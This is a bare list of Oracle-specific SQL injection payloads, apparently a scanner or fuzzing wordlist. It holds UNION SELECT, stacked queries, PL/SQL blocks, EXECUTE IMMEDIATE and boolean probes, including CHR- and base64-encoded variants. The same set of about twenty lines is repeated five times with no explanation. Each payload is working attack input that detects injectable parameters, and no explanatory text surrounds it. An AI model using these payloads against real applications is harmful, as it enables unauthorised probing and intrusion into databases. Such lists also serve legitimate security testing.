'||'TEST'||'
' UNION SELECT 'TEST' FROM dual --
'; SELECT 'TEST' FROM dual; --
'; BEGIN dbms_output.put_line('TEST'); END; --
'||CHR(84)||CHR(69)||CHR(83)||CHR(84)||'
'||UTL_RAW.CAST_TO_VARCHAR2(UTL_ENCODE.BASE64_ENCODE(UTL_RAW.CAST_TO_RAW('TEST')))||'
' AND EXISTS(SELECT 'TEST' FROM dual) --
'; EXECUTE IMMEDIATE 'SELECT ''TEST'' FROM dual'; --
' UNION ALL SELECT NULL,'TEST' FROM dual --
' AND 1=(SELECT COUNT(*) FROM dual WHERE 'a'='a' AND ROWNUM=1 AND 'TEST'='TEST') --
' AND ASCII(SUBSTR('TEST',1,1))=84 --
' AND LENGTH('TEST')=4 --
' AND INSTR('TEST','T')=1 --
' AND LOWER('TEST')='test' --
' AND UPPER('test')='TEST' --
' AND NVL(NULL,'TEST')='TEST' --
' AND DECODE('TEST','TEST',1,0)=1 --
' AND DUMP('TEST') LIKE '%TEST%' --
' AND EXISTS(SELECT 1 FROM dual WHERE 'TEST'='TEST') --
' AND ROWNUM <= (SELECT COUNT(*) FROM dual WHERE 'TEST'='TEST') --
'||'TEST'||'
' UNION SELECT 'TEST' FROM dual --
'; SELECT 'TEST' FROM dual; --
'; BEGIN dbms_output.put_line('TEST'); END; --
'||CHR(84)||CHR(69)||CHR(83)||CHR(84)||'
'||UTL_RAW.CAST_TO_VARCHAR2(UTL_ENCODE.BASE64_ENCODE(UTL_RAW.CAST_TO_RAW('TEST')))||'
' AND EXISTS(SELECT 'TEST' FROM dual) --
'; EXECUTE IMMEDIATE 'SELECT ''TEST'' FROM dual'; --
' UNION ALL SELECT NULL,'TEST' FROM dual --
' AND 1=(SELECT COUNT(*) FROM dual WHERE 'a'='a' AND ROWNUM=1 AND 'TEST'='TEST') --
' AND ASCII(SUBSTR('TEST',1,1))=84 --
' AND LENGTH('TEST')=4 --
' AND INSTR('TEST','T')=1 --
' AND LOWER('TEST')='test' --
' AND UPPER('test')='TEST' --
' AND NVL(NULL,'TEST')='TEST' --
' AND DECODE('TEST','TEST',1,0)=1 --
' AND DUMP('TEST') LIKE '%TEST%' --
' AND EXISTS(SELECT 1 FROM dual WHERE 'TEST'='TEST') --
' AND ROWNUM <= (SELECT COUNT(*) FROM dual WHERE 'TEST'='TEST') --
'||'TEST'||'
' UNION SELECT 'TEST' FROM dual --
'; SELECT 'TEST' FROM dual; --
'; BEGIN dbms_output.put_line('TEST'); END; --
'||CHR(84)||CHR(69)||CHR(83)||CHR(84)||'
'||UTL_RAW.CAST_TO_VARCHAR2(UTL_ENCODE.BASE64_ENCODE(UTL_RAW.CAST_TO_RAW('TEST')))||'
' AND EXISTS(SELECT 'TEST' FROM dual) --
'; EXECUTE IMMEDIATE 'SELECT ''TEST'' FROM dual'; --
' UNION ALL SELECT NULL,'TEST' FROM dual --
' AND 1=(SELECT COUNT(*) FROM dual WHERE 'a'='a' AND ROWNUM=1 AND 'TEST'='TEST') --
' AND ASCII(SUBSTR('TEST',1,1))=84 --
' AND LENGTH('TEST')=4 --
' AND INSTR('TEST','T')=1 --
' AND LOWER('TEST')='test' --
' AND UPPER('test')='TEST' --
' AND NVL(NULL,'TEST')='TEST' --
' AND DECODE('TEST','TEST',1,0)=1 --
' AND DUMP('TEST') LIKE '%TEST%' --
' AND EXISTS(SELECT 1 FROM dual WHERE 'TEST'='TEST') --
' AND ROWNUM <= (SELECT COUNT(*) FROM dual WHERE 'TEST'='TEST') --
'||'TEST'||'
' UNION SELECT 'TEST' FROM dual --
'; SELECT 'TEST' FROM dual; --
'; BEGIN dbms_output.put_line('TEST'); END; --
'||CHR(84)||CHR(69)||CHR(83)||CHR(84)||'
'||UTL_RAW.CAST_TO_VARCHAR2(UTL_ENCODE.BASE64_ENCODE(UTL_RAW.CAST_TO_RAW('TEST')))||'
' AND EXISTS(SELECT 'TEST' FROM dual) --
'; EXECUTE IMMEDIATE 'SELECT ''TEST'' FROM dual'; --
' UNION ALL SELECT NULL,'TEST' FROM dual --
' AND 1=(SELECT COUNT(*) FROM dual WHERE 'a'='a' AND ROWNUM=1 AND 'TEST'='TEST') --
' AND ASCII(SUBSTR('TEST',1,1))=84 --
' AND LENGTH('TEST')=4 --
' AND INSTR('TEST','T')=1 --
' AND LOWER('TEST')='test' --
' AND UPPER('test')='TEST' --
' AND NVL(NULL,'TEST')='TEST' --
' AND DECODE('TEST','TEST',1,0)=1 --
' AND DUMP('TEST') LIKE '%TEST%' --
' AND EXISTS(SELECT 1 FROM dual WHERE 'TEST'='TEST') --
' AND ROWNUM <= (SELECT COUNT(*) FROM dual WHERE 'TEST'='TEST') --
'||'TEST'||'
' UNION SELECT 'TEST' FROM dual --
'; SELECT 'TEST' FROM dual; --
'; BEGIN dbms_output.put_line('TEST'); END; --
'||CHR(84)||CHR(69)||CHR(83)||CHR(84)||'
'||UTL_RAW.CAST_TO_VARCHAR2(UTL_ENCODE.BASE64_ENCODE(UTL_RAW.CAST_TO_RAW('TEST')))||'
' AND EXISTS(SELECT 'TEST' FROM dual) --
'; EXECUTE IMMEDIATE 'SELECT ''TEST'' FROM dual'; --
' UNION ALL SELECT NULL,'TEST' FROM dual --
' AND 1=(SELECT COUNT(*) FROM dual WHERE 'a'='a' AND ROWNUM=1 AND 'TEST'='TEST') --
' AND ASCII(SUBSTR('TEST',1,1))=84 --
' AND LENGTH('TEST')=4 --
' AND INSTR('TEST','T')=1 --
' AND LOWER('TEST')='test' --
' AND UPPER('test')='TEST' --
' AND NVL(NULL,'TEST')='TEST' --
' AND DECODE('TEST','TEST',1,0)=1 --
' AND DUMP('TEST') LIKE '%TEST%' --
' AND EXISTS(SELECT 1 FROM dual WHERE 'TEST'='TEST') --
' AND ROWNUM <= (SELECT COUNT(*) FROM dual WHERE 'TEST'='TEST') --